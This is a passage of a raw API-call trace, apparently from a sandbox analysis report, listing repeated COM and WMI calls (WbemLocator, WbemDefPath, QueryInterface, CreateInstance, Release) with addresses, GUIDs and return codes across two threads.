Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0178.836] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596fc8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x5943c0) returned 0x0 [0178.836] WbemDefPath:IUnknown:Release (This=0x596fc8) returned 0x0 [0178.836] WbemDefPath:IUnknown:QueryInterface (in: This=0x5943c0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x5943c0) returned 0x0 [0178.837] WbemDefPath:IUnknown:QueryInterface (in: This=0x5943c0, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0178.837] WbemDefPath:IUnknown:QueryInterface (in: This=0x5943c0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0178.837] WbemDefPath:IUnknown:AddRef (This=0x5943c0) returned 0x3 [0178.837] WbemDefPath:IUnknown:QueryInterface (in: This=0x5943c0, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0178.837] WbemDefPath:IUnknown:QueryInterface (in: This=0x5943c0, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0178.837] WbemDefPath:IUnknown:QueryInterface (in: This=0x5943c0, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5b1b28) returned 0x0 [0178.837] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5b1b28, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.837] WbemDefPath:IUnknown:Release (This=0x5b1b28) returned 0x3 [0178.837] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0178.837] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0178.837] WbemDefPath:IUnknown:QueryInterface (in: This=0x5943c0, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0178.837] WbemDefPath:IUnknown:Release (This=0x5943c0) returned 0x2 [0178.837] WbemDefPath:IUnknown:Release (This=0x5943c0) returned 0x1 [0178.837] SetEvent (hEvent=0x46c) returned 1 [0184.303] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596e18) returned 0x0 [0184.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x596e18, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0184.304] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596e18, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594350) returned 0x0 [0184.304] WbemDefPath:IUnknown:Release (This=0x596e18) returned 0x0 [0184.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594350) returned 0x0 [0184.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0184.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0184.304] WbemDefPath:IUnknown:AddRef (This=0x594350) returned 0x3 [0184.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0184.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0184.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5cd390) returned 0x0 [0184.305] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5cd390, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.305] WbemDefPath:IUnknown:Release (This=0x5cd390) returned 0x3 [0184.305] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0184.305] CoGetContextToken (in: pToken=0x4e0e9e8 | out: pToken=0x4e0e9e8) returned 0x0 [0184.305] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0184.305] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0184.305] WbemDefPath:IUnknown:Release (This=0x594350) returned 0x2 [0184.305] WbemDefPath:IUnknown:Release (This=0x594350) returned 0x1 [0184.305] SetEvent (hEvent=0x4e8) returned 1 [0184.507] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596cf8) returned 0x0 [0184.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0184.507] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596cf8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x5945f0) returned 0x0 [0184.507] WbemDefPath:IUnknown:Release (This=0x596cf8) returned 0x0 [0184.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x5945f0) returned 0x0 [0184.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0184.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0184.507] WbemDefPath:IUnknown:AddRef (This=0x5945f0) returned 0x3 [0184.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0184.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0184.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5cd3d8) returned 0x0 [0184.508] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5cd3d8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.508] WbemDefPath:IUnknown:Release (This=0x5cd3d8) returned 0x3 [0184.508] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0184.508] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0184.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0184.508] WbemDefPath:IUnknown:Release (This=0x5945f0) returned 0x2 [0184.508] WbemDefPath:IUnknown:Release (This=0x5945f0) returned 0x1 [0184.508] SetEvent (hEvent=0x4e4) returned 1 [0185.894] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596ee8) returned 0x0 [0185.895] WbemDefPath:IUnknown:QueryInterface (in: This=0x596ee8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0185.895] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596ee8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x5942e0) returned 0x0 [0185.895] WbemDefPath:IUnknown:Release (This=0x596ee8) returned 0x0 [0185.895] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x5942e0) returned 0x0 [0185.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0185.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0185.896] WbemDefPath:IUnknown:AddRef (This=0x5942e0) returned 0x3 [0185.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0185.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0185.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5ccd30) returned 0x0 [0185.896] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ccd30, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0185.896] WbemDefPath:IUnknown:Release (This=0x5ccd30) returned 0x3 [0185.896] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0185.896] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0185.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0185.896] WbemDefPath:IUnknown:Release (This=0x5942e0) returned 0x2 [0185.896] WbemDefPath:IUnknown:Release (This=0x5942e0) returned 0x1 [0185.896] SetEvent (hEvent=0x444) returned 1 [0187.915] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x54e598) returned 0x0 [0187.915] WbemDefPath:IUnknown:QueryInterface (in: This=0x54e598, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0187.915] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54e598, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594660) returned 0x0 [0187.916] WbemDefPath:IUnknown:Release (This=0x54e598) returned 0x0 [0187.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594660) returned 0x0 [0187.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0187.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0187.916] WbemDefPath:IUnknown:AddRef (This=0x594660) returned 0x3 [0187.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0187.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0187.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x5b1438) returned 0x0 [0187.916] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5b1438, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0187.916] WbemDefPath:IUnknown:Release (This=0x5b1438) returned 0x3 [0187.916] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0187.916] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0187.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0187.916] WbemDefPath:IUnknown:Release (This=0x594660) returned 0x2 [0187.916] WbemDefPath:IUnknown:Release (This=0x594660) returned 0x1 [0187.917] SetEvent (hEvent=0x3e4) returned 1 Thread: id = 164 os_tid = 0x11c8 [0157.155] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0157.155] RoInitialize () returned 0x1 [0157.155] RoUninitialize () returned 0x0 [0157.156] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x4f4f7f4 | out: lpiid=0x4f4f7f4) returned 0x0 [0157.157] CoGetClassObject (in: rclsid=0x588014*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4f4f500 | out: ppv=0x4f4f500*=0x59ac58) returned 0x0 [0157.157] WbemLocator:IUnknown:QueryInterface (in: This=0x59ac58, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4f4f71c | out: ppvObject=0x4f4f71c*=0x0) returned 0x80004002 [0157.157] WbemLocator:IClassFactory:CreateInstance (in: This=0x59ac58, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4f728 | out: ppvObject=0x4f4f728*=0x596da8) returned 0x0 [0157.158] WbemLocator:IUnknown:Release (This=0x59ac58) returned 0x0 [0157.158] WbemLocator:IUnknown:QueryInterface (in: This=0x596da8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4f34c | out: ppvObject=0x4f4f34c*=0x596da8) returned 0x0 [0157.158] WbemLocator:IUnknown:QueryInterface (in: This=0x596da8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4f4f308 | out: ppvObject=0x4f4f308*=0x0) returned 0x80004002 [0157.158] WbemLocator:IUnknown:QueryInterface (in: This=0x596da8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4f4eefc | out: ppvObject=0x4f4eefc*=0x0) returned 0x80004002 [0157.159] 